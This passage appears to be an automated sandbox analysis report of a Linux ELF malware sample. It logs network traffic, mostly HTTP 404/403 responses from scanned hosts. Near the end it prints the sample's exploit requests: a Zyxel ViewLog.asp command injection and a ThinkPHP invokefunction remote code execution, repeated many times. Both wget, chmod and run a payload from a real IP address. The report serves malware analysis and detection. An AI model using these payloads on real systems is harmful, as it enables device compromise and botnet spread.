20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 31 30 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resou
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:19:52 GMTServer: Apache/2.2.22 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 246Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8f d1 4b c3 30 10 c6 df fb 57 9c 7b d2 87 e5 da 52 64 42 08 e8 da e1 a0 ce a2 dd 60 8f e9 72 2e 81 d9 d4 24 73 f8 df 9b 76 08 72 70 f0 dd 7d bf e3 3b 7e 53 be 2e db 7d 53 c1 73 fb 52 43 b3 7d aa d7 4b 98 cd 11 d7 55 bb 42 2c db f2 ba c9 59 8a 58 6d 66 22 e1 3a 7c 9e 04 d7 24 55 14 c1 84 13 89 22 2d 60 63 03 ac ec b9 57 1c af c3 84 e3 64 e2 9d 55 3f 23 97 89 7f 9e a8 12 3e 88 56 13 38 fa 3a 93 0f a4 60 fb 56 03 1e 8e 66 de 99 1e 77 86 2e b5 3d 32 e9 07 b8 48 0f 7d 84 3f 46 18 6c 0f 41 1b 0f 9e dc 37 39 c6 71 18 cf bb d8 a4 52 8e bc 17 8f 83 3c 68 c2 9c c5 ca e1 b6 a4 ce c8 fe 0e de 27 00 64 80 ec 21 67 d9 fd 82 a5 2c 2b a0 b1 2e c0 22 e5 f8 87 c7 e8 53 e8 18 73 7c 36 f9 05 62 75 4b 42 27 01 00 00 Data Ascii: MK0W{RdB`r.$svrp};~S.}SsRC}KUB,YXmf":|$U"-`cWdU?#>V8:`Vfw.=2H}?FlA79qR<h'd!g,+."Ss|6buKB'
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:19:52 GMTServer: Apache/2.2.3 (CentOS)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><hr><address>Apache/2.2.3 (CentOS) Server at localhost Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Nov 2023 00:48:39 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 22:20:00 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Mar 1970 17:26:49 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: privateContent-Length: 0Date: Mon, 13 Nov 2023 22:20:05 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Mon, 13 Nov 2023 21:20:08 GMTServer: lighttpd/1.4.45Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:20:15 GMTConnection: Close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Mon, 13 Nov 2023 21:20:36 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Mon, 13 Nov 2023 21:20:34 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 38 32 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Oct 2023 03:04:52 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 14892254304440636894Connection: closeServer: Lego ServerDate: Mon, 13 Nov 2023 21:20:42 GMTX-Cache-Lookup: Return Directly
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 9523076367547271349Connection: closeServer: Lego ServerDate: Mon, 13 Nov 2023 21:20:43 GMTX-Cache-Lookup: Return Directly
          Source: mods.arm7.elfString found in binary or memory: http://93.123.85.5/bins/x86
          Source: mods.arm7.elfString found in binary or memory: http://93.123.85.5/zyxel.sh;
          Source: mods.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: mods.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownHTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
